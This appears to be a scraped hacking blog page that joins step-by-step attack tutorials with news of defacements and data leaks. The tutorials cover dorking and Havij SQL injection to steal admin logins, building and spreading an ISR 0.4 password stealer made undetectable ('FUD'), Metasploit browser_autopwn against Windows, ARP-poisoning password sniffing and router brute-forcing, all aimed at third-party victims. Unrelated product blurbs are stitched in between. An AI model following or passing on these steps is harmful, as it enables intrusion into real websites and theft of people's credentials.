Hi Friends in this Tutorial i will Tell you How to Hack Web Sites With Sql Injection tool, there are large amount of sql vulnerable sites available.

Google Dorks: Google dorks are specifically query's that can reveal all the information about the specific website. I am giving you some Google dorks which you can use for finding the website vulnerable to sql injection.

    addToCart.php?idProduct=

    addtomylist.php?ProdId=

    add-to-cart.php?ID=

    adminEditProductFields.php?intProdID=

    advSearch_h.php?idCategory=

    affiliate.php?ID=

    affiliate-agreement.cfm?storeid=

    affiliates.php?id=

    ancillary.php?ID=

    archive.php?id=

    article.php?id=

    phpx?PageID

    basket.php?id=

    Book.php?bookID=

    book_list.php?bookid=

    book_view.php?bookid=

    BookDetails.php?ID=

Finding target:

1) Now just paste any one of the query in Google search box you will get a lot of websites.

2) Now open any of the website so you will get the link like this.
    www.example/index.php?id=12 or any number

3) We have to just add a single quote (') at the end of link so it will become some thing like this.
    www.example.com/index.php?id=12'

4) Look closely at the page before adding single quote (') and after adding single quote (') . If the some element of the page is missing then Bingo!!! you have found a vulnerable website. Now we can start our sql injection. And if the page remains the same or show's error like page not found then it is not vulnerable and you should move to another website. 

Now we have our target ready so what are you waiting for just attack.

1) First of all download Havij 1.15 

                                           Download Havij

2) Now extract it and run it. It will look some thing like this.

3) Now paste your target in the highlighted box. And click analyze.

4) Let it analyze your target for some time. and then you will see something like this.

5) Now click on "Tables" tab. You will see something like this.

6) Now click on "Get DBs" ( Make sure you have tick-marked on the first option, let it be anything ). Now wait for about a minute you will some thing like this.

7) Now tick-mark both the option's. And click on "Get Tables". And wait for some 2-3 minutes. You will get a lot of information from this. It'll look something like this.

8) Now search something sensitive like admin, users, login, passwords, and many more. Tick-mark them and click on "Get Columns". You will see something like this.

9) Now there you have user_id, password, user_name. Now tick-mark them and select "Get Data". You will see something like this.

10) Now find admin panel. And login using the user_id and password found.

What is Ethical hacking?

Ethical hacking is the process of hacking the information that is considered to be confidential. The information through the ethical hacking does not remain secret at all. The ethical hacking process is also known as the intrusion testing, penetration testing or red teaming. However the ethical hacking also gives s professional certification to the certified ethical hacker where the hacking of the computer system or some other devices takes place. This service had been made available to the people by the international council of e-commerce consultants.

Moreover for the ethical hacking the user has to be an ethical hacker which is somehow the name that is given to the person and for this the person must be a penetration tester. The ethical hacker is responsible for the performance of different activities. The main role that had been allotted to the ethical hacker is that he is the person who is mainly working for an organization or the organization hires the ethical hacker for the purpose of penetrating the information from different networks or systems. The organization trusts the ethical hacker as he is responsible for providing different services to the firm.

The ethical hacking service is very much similar to that of the hacking and the ethical hacker is also working in the same way as the hacker is working for different purposes. The ethical hacker is the person who is found to be a computer expert and at the same time he is also responsible for the working of the networking systems as well. He is the person who works on behalf of the members of the organization. At times the hacking service that is being provided by the hacker can also be dangerous for the firm and hence it can exploit the systems of the company

Hack was performed by Anonymous India hacking group and claiming to hack whole server, with 250 Databases. Hacker wrote on deface page, that they deleted all the databases and dump credentials of BSNL database servers in a pastebin File.

This time Yahoo Messenger is turning to get a feature trim, and the company has announced on their blog that the once popular messaging service will lose some important features starting December 14th.

First of all Yahoo Messenger will lose interoperability with Microsoft’s Live Messenger. Users will still see their Live friends online but they will not be able to send them messages or interact in any way.

Chat Rooms as well as Voice calls to landlines are also getting cut.
And lastly and probably least important: Pingbox, an embeddable applet developed by Yahoo, will stop functioning after the 14th.
 Anonymous Supporters defaced 500 websites
Hacker’s Supporting Anonymous Group, with nickname - "PV~E.rr0r" hacked 516 websites.  Deface page shows Anonymous logo with text "We unite as one but no one can divide us. Expect us!"

Hacker’s intention was not to harm the website, so he has not change or delete any file, he just upload his deface page on each site at "/Err0r.html".

At the end of July, Microsoft launched the public beta of Outlook.com, its new online email service. Today, Microsoft announced that since the beta launch, there are now over 25 million active users on Outlook.com.

"H4ksniper" hacker hacked three South African government websites. The website opened to a black page with a window containing the animated graphic “Website hacked by H4ksniper”.

Another message on the deface page was "Hello South Africa :D , Bad News For You IM BACK ! ..You Messed With Us & Now You Must Suffer..From Morocco with love."

A Cloud-based Security service which can significantly enhance the security of your website, while also boosting its performance.
a Distributed Denial of Service (DDoS) attack is a DoS attack that is usually carried out by a “botnet”, a network of computers acting in concert to overwhelm the server by depleting all available resources.
Incapsula DDoS Protection service use both defense techniques, by integrating a Global network of multi-gigabit scrubbing centers with a unique bot (automation) detection technology.
As a result, Incapsula provides complete protection from network (Layer 3 & 4) and application level (Layer 7) DDoS attacks.

Hacker’s group “Anonymous”  has declared cyberwar on Israel, posting personal data of five thousand Israeli officials online.
The Israeli government has ignored repeated warnings about the abuse of human rights, shutting down the internet in Israel and mistreating its own citizens and those of its neighboring countries,” the hackers wrote in a statement.

The document contains names, email addresses and ID numbers apparently belonging to Israeli officials.

President of Sri Lanka official website(president.gov.lk)  has been hacked by hacker named "Broken-Security", using Blind Sql Injection vulnerability and is also posted on a pastebin note with database dump including table and column names. Dump include the Username and Encrypted password of admin.

What is Stealer?
Stealer is basically used for steal the saved cookies in browsers. It only steal The saved Passwords in browsers eg.IE, chrome, firefox, And any massangers.
Tools to use
• IS 6.0 ,6.3
• ISR 0.4
These are mainly used tools to steal the passwords.
We seen many stealers like istealer6.0 or something like that but now in this these tools are not in use bcoz we seen in logs username password is same. So we can use this upgraded version that is CALLED ISR 0.4 that is ultimate stealer to use..so use this tool to hack the password.

Here Is the tutorial to use it.

What you Need to use it.
1. Domain
2. Hosting
3. My SQL Database
4. Tools eg.ISR 0.4

1.Domain
Purchase a domain or free Doamin’s are also available.
Eg.www.example.com

2.HOSTING
Then you Want Hosting. Hosting is a web space that is used for host your website there with your domain name.

3.My SQL database
That is used to store web site information like blog posts or user information. A MySQL database is the most popular type of relational database on the web today.

4.Tools
That tools is our main part to steal the cookies from victims.
SO let’s start..
First purchase a domain and hosting accoung. OR it’s available in free also.
I am doing this with free domain and free hosting.
Here you go.

STEPS:

1. Go to http://000webhost.com
2. Sign up there with free order.
3. After creating your hosting and domain Go to your cpanel.
After that Create My SQL Database .
1. GO to SQL Database 

2. Create a database and one database user account.

3. After creating Database save this information.

• $dbHost = "fdb-1-5.cwahi.net"; // (1)MySQL host

• $dbUser = "username"; // (3)MySQL username

• $dbPass = "password"; // (4)MySQL password

• $dbDatabase = "username_db1"; // (2)MySQL database name

Then back to cpanel after that

1. Go to file manger.

2. Here you want go in public_html

3. Here you want to upload some files of our tools that is in PHP 

language.

WE are using ISR 0.4

So it’s files are.

• Config.php

• Install.php

• Index.php

• Style.css

So upload these files in your directory.

After that go to your directory .

1. Click on config.php

2. Click on edit.

Then go your Domain name eg.www.example.com

1. Then type in url: http://www.example.com/install.php

2. Then click on INSTALL

3. After install delete install.php from your hosting.

Here is everything is done with hosting and domain.

1. Go to your tool That is ISR0.4.exe

2. Open it in url field paste your domain name link here.

Eg. http://www.example.com/index.php

3. Then click on Bulid Server 

4. After bulid server bind your file with Anything and make a fud.

5. Spread it….And enjoy it…

6. TO show your logs go to your domain eg. http://www.example.com/index.php

7. Login there with your usename password.

If You Wnat to download these all files which You use in create stealer.

                                                                   Download

ImageShack server has been hacked and leaked all the files online, and an Antivirus Company Symantec's portal also hacked and database dumped in a pastebin File.

 Important files of the server, like /etc/passwd , /etc/shadow , has been leaked, content list of ImageShack Web directory (/home/image/www) etc. Hacker claimed to use zero day vulnerability .

In Symantec case, hackers leak complete database from online portal. Database information includes Phone numbers, email, domain, password, Name, Username etc.

Anonymous leaks VMware ESX Server Kernel source code
"Stun", the member of group “Anonymous” leaks the VMware ESX Server Kernel source code via twitter today. The tweet reads,  "WILD LEAKY LEAK. FULL VMware ESX Server Kernel LEAKED. VMware ESX is an enterprise-level computer virtualization product offered by VMware.

A 1.89 MB uploaded on torrent and titled "VMware ESX Server Kernel LEAKED". 

Hack Windows 7 In 2 minutes
=====================

What You Need To Do ANd What you Want to do?

1.Backtrack
2.Windows 7 machine
3.Installed Browser eg  chrome, IE, Firefox or any


So Let's Start
============
1.Start Backtrack
2.Type "Startx" To enter GUI mode of Backtrack.

3.Go To terminal

4.Type "msfconsole"

5. Type msf:>use auxiliary/server/browser_autopwn

 msf :>show Options

Set LHOST means Localhost ip address To check Localhost ip Go to terminal And type "ifconfig"

7. msf:>set LHOST eg.192.168.168.1

After That you want set SRVPORT which is 80 or 8080

8.msf:>set SRVPORT 80

Then set URIPATH eg.root "/"

9.msf:>set URIPATH /

Now Everything Is done

10.msf:>exploit or run

Now What to need To to open On victim Machine

Open Any Browser Type Your BAcktrack Machine's ip address

eg.http://192.168.168.1/

After A minute you Can see our Session Is open

msf:>sessions -i 1

ENjoy......

If You have any problem Reply Here

Secunia, the leading provider of IT security, today announced the  the new version of Secunia’s Vulnerability Intelligence Manager, the VIM 4.0
The Secunia VIM 4.0 is the latest evolutionary step in the technology. Secunia has developed to help organizations handle vulnerabilities and protect business critical information and assets against potential attacks. Because it covers more than 40,000 software systems and applications, the VIM 4.0 solution provides the most comprehensive intelligence about software vulnerabilities available to organizations, ensuring that all security threats can be dealt with before the IT infrastructure is compromised by cybercriminals.

Key benefits of the Secunia VIM include:
• Reliable and accurate Vulnerability Intelligence at your fingertips
• Personalised alerts via email and SMS
• Comprehensive XML feeds
• Comprehensive Vulnerability Management tool
• Threat intelligence covering more than 40,000 systems and applications
What’s new in VIM 4.0:
• New and improved user interface
• Integration with the Secunia CSI
• Improved assets matching
• Improved data export
• Activity log

SQL Injection - How To Attack and How To Prevent

Download From Here - http://secugenius.com/sqlinjection.pdf

How To Sniff Passwords With Cain And Abel

Download Cain and Abel Here: http://www.oxid.it/downloads/ca_setup.exe

-> Run Cain and Abel as administrator
-> Go to the tab that says sniffer
-> Go to the upper right corner under the Cain picture and enable the sniffer
-> select your adapter (usually the one that has a listed Ip address)
-> Click of the blue Plus sign
-> Leave everything as is and press ok
-> Right click on each of ip addresses that come up
-> Resolve the host name for each one of them
-> Go to the bottom of the screen and hit the APR tab
-> Click on the top box
-> Click the blue plus sign
-> Hind the computer you want get passwords/information from in the left hand box
-> Highlight everything that comes up in the righthand box
-> Go to the upper right hand corner, by the sniffer and enable the APR poisener
-> To Find passwords, go to the bottem of the screen where it says passwords
-> Here you will find all usernames and passwords of the person you have poisened (Most of the passwords will be in HTTP)
-> If you didn't understand this look below

How to Hide your Computer in LAN/Local Area Network

When you want to hack any local network like wireless you want to be invisible
so no one can see your pc in that local network.

if your local network name is WORKGROUP then pass step 1 go to step 2.

1 – go to: My Computer —-> Properties —-> Computer Name —-> Change —–> WORKGROUP = Change to WORKGROUP
next restart your pc .

2 – go to Start ——-> Run ——-> Cmd then type on command line:

net config server /hidden:yes

After that you will get message from system on command line like this :

The command completed successfully.

This is direct command

C:\Documents and Settings\Imports.system>net config server /hidden:yes

The command completed successfully.

After few mins your computer will be invisible.

To Confirm it check your “My Network Places”

My Network Places ——–> View workgroup computers .

if want be visible change yes to no like this :

net config server /hidden:no

How To Rename Your Recycle Bin

1. Click Start / Run

2. Type regedit and press enter.
3. Open the HKEY_CLASSES_ROOT folder
4. Open the CLSID folder
5. Open the {645FF040-5081-101B-9F08-00AA002F954E} folder
6. Open the ShellFolder folder
7. Change the "Attributes" data value from "40 01 00 20" to "50 01 00 20". Once completed change the "CallForAttributes" dword value to "0x00000000" (doubleclick and change value data to 0). You must change both of these values to get the rename to appear.

After performing the above steps you will be able to rename the icon like any other icon.
Right-click the Recycle Bin icon on the desktop and click Rename and rename it to whatever you wish.

How To Crack A Router For Username and Password

(I will be using Brutus to crack a D-Link route.)

1.When we want to access our router,it will be password protected.We can try the default username and password.

As you can see,it is password protected.
2.I will open up my Brutus.

3.Configure Brutus.Put the target as the router's IP address.Put in the userlist and
the passlist.After everything is OK,press on START.

As you can see from the picture above, Brutus is cracking the router.
4.Wait for Brutus to finish cracking the router.You will get this result.

You can see that i have get my username and password for the router.
5.Go to the page and type in the username and password.

Chat with Friends through MS-DOS Command Prompt 

1) All you need is your friend's IP Address and your Command Prompt.
2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
You would then see something like this:

6) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

7) Now all you need to do is type your message and press Enter.

Start Chatting.......!